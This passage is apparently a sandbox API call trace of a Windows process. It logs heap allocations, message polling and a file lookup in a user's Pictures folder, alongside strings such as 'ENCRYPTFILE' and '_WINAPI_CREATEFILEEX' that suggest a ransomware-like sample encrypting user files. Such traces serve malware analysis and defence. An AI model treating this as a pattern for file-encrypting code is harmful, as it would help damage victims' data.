[0092.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0092.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0092.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0092.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19d20a8 | out: hHeap=0x1780000) returned 1 [0092.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0092.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0092.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0092.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0092.413] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0092.413] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0092.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0092.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0092.413] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0092.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0092.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0092.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0092.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e23e0 [0092.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0092.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0092.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0092.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0092.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0092.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0092.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0092.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0092.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a240 [0092.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0092.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0092.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0092.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0092.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe0) returned 0x19e5a98 [0092.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a240 | out: hHeap=0x1780000) returned 1 [0092.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0092.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0092.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0092.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0092.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9fc8 [0092.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf798 [0092.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0092.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0092.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0092.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0092.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0092.414] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0092.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0092.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0092.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0092.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0092.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0092.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0092.414] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0092.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0092.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0092.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0092.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0092.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0092.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0092.415] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\7mFkSCM1jm586Ad_.png", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8926ac0, ftCreationTime.dwHighDateTime=0x1d5f077, ftLastAccessTime.dwLowDateTime=0x260c180, ftLastAccessTime.dwHighDateTime=0x1d5e6a7, ftLastWriteTime.dwLowDateTime=0x260c180, ftLastWriteTime.dwHighDateTime=0x1d5e6a7, nFileSizeHigh=0x0, nFileSizeLow=0x6f4b, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="7mFkSCM1jm586Ad_.png", cAlternateFileName="7MFKSC~1.PNG")) returned 0x41ac640 [0092.415] FindClose (in: hFindFile=0x41ac640 | out: hFindFile=0x41ac640) returned 1 [0092.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0092.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0092.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0092.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0092.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0092.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0092.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0092.415] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0092.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0092.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0092.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0092.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2340 [0092.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0092.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0092.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0092.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0092.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0092.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9f08 [0092.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0092.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0092.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0092.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0092.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0092.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0092.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0092.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0092.416] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0092.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0092.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0092.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0092.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0092.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0092.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0092.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0092.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0092.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ee0 [0092.416] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0092.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ee0 | out: hHeap=0x1780000) returned 1 [0092.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0092.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0092.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24a0 [0092.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0092.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0092.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0092.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0092.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0092.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2360 [0092.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0092.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0092.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0092.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24b0 [0092.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0092.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0092.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0092.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca0a0 [0092.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0092.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0092.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0092.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0092.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0092.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0092.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0092.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0092.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0092.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0092.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0092.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0092.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0092.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0092.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0092.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0092.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0092.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0092.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0092.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0092.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0092.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0092.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0092.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0092.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0092.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0092.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0092.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0092.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0092.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0092.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0092.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0092.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0092.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0092.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0092.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0092.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0092.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0092.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0092.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0092.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0092.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0092.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0092.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0092.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0092.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0092.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0092.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0092.419] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0092.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0092.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0092.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0092.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0092.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0092.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0092.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0092.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0092.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0092.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0092.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0092.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0092.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0092.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0092.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0092.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0092.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0092.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0092.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0092.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0092.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0092.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0092.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0092.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0092.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0092.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0092.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0092.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0092.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0092.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0092.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0092.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0092.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0092.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0092.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0092.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0092.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0092.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0092.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0092.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0092.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0092.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0092.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0092.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0092.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0092.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0092.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0092.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0092.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0092.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0092.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0092.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0092.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0092.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0092.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0092.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0092.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0092.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0092.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0092.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0092.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0092.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0092.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0092.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0092.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0092.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0092.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0092.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0092.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0092.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0092.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0092.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0092.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0092.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0092.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0092.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0092.421] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0092.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0092.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0092.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0092.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0092.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0092.421] HeapFree (in: 